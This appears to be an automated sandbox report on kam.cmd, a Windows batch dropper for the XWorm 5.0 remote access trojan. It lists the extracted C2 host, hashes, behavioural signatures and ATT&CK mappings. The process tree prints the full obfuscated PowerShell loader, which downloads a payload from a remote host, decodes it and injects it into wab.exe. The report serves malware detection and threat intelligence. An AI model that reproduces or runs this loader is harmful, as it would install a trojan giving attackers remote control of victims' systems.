Overview

overview

10

Static

static

1

kam.cmd

windows7-x64

10

kam.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    kam.cmd

  • Size

    6KB

  • MD5

    37b176c0abc29ec74dede88ced6e4cf1

  • SHA1

    4aed169208162c12f26dfbe68e94e6781afcc47e

  • SHA256

    7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5

  • SHA512

    e8c36cf60ec4ac67dc60e30e8c60b58e12bd4ab522b8990faf038931bc5c93f41b144cc947847e23f09c163cf273f973d5162bf3f37b1c00f2ff7e19c54c5603

  • SSDEEP

    192:qFS6GncJ3ovYJpHx+WHCNQWq/HncI1yiRj:qFS6Gq3AYJ/+AWqPncyX

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kam.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3232
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
        3⤵
          PID:3628
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
            4⤵
              PID:832
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1252

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqo0ialn.j1i.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Tchick.Ite
        Filesize

        430KB

        MD5

        bdadd978558699fea737d403e575031f

        SHA1

        794dccf91b26b92d478f7d749e77023822c19541

        SHA256

        236f3f6ca6e56622e271632101ab25cb05638dcca0369b00dd6662a79ae16cd2

        SHA512

        6be56d307dbf947e3d340db2a14e136cfb9998949f98216d6e31951291ec4ec73158f3c771b9448743e955e26872f6fd0ded4960aeda7d9a0163711dd6925cc4

        Download Submit
      • memory/1252-73-0x0000000022BD0000-0x0000000022C6C000-memory.dmp
        Filesize

        624KB

        Download
      • memory/1252-79-0x0000000022DE0000-0x0000000022DEA000-memory.dmp
        Filesize

        40KB

        Download
      • memory/1252-77-0x0000000022EC0000-0x0000000022F52000-memory.dmp
        Filesize

        584KB

        Download
      • memory/1252-72-0x0000000000C80000-0x0000000000C90000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1252-71-0x0000000000C80000-0x0000000001ED4000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/3232-13-0x00007FF947470000-0x00007FF947F31000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3232-14-0x00007FF947470000-0x00007FF947F31000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3232-76-0x00007FF947470000-0x00007FF947F31000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3232-2-0x00007FF947473000-0x00007FF947475000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3232-3-0x0000020BA0290000-0x0000020BA02B2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3232-51-0x00007FF947470000-0x00007FF947F31000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3232-50-0x00007FF947473000-0x00007FF947475000-memory.dmp
        Filesize

        8KB

        Download
      • memory/5000-25-0x0000000075090000-0x0000000075840000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/5000-40-0x0000000005A70000-0x0000000005DC4000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/5000-43-0x0000000007890000-0x0000000007F0A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/5000-44-0x00000000065E0000-0x00000000065FA000-memory.dmp
        Filesize

        104KB

        Download
      • memory/5000-45-0x00000000072F0000-0x0000000007386000-memory.dmp
        Filesize

        600KB

        Download
      • memory/5000-46-0x0000000007280000-0x00000000072A2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/5000-47-0x00000000084C0000-0x0000000008A64000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/5000-41-0x0000000006040000-0x000000000605E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/5000-49-0x0000000008A70000-0x000000000B6C8000-memory.dmp
        Filesize

        44.3MB

        Download
      • memory/5000-42-0x00000000063F0000-0x000000000643C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/5000-28-0x0000000005860000-0x00000000058C6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/5000-54-0x0000000075090000-0x0000000075840000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/5000-53-0x000000007509E000-0x000000007509F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/5000-55-0x0000000075090000-0x0000000075840000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/5000-30-0x0000000075090000-0x0000000075840000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/5000-29-0x0000000005A00000-0x0000000005A66000-memory.dmp
        Filesize

        408KB

        Download
      • memory/5000-27-0x00000000057C0000-0x00000000057E2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/5000-26-0x0000000005150000-0x0000000005778000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/5000-24-0x0000000002730000-0x0000000002766000-memory.dmp
        Filesize

        216KB

        Download
      • memory/5000-23-0x000000007509E000-0x000000007509F000-memory.dmp
        Filesize

        4KB

        Download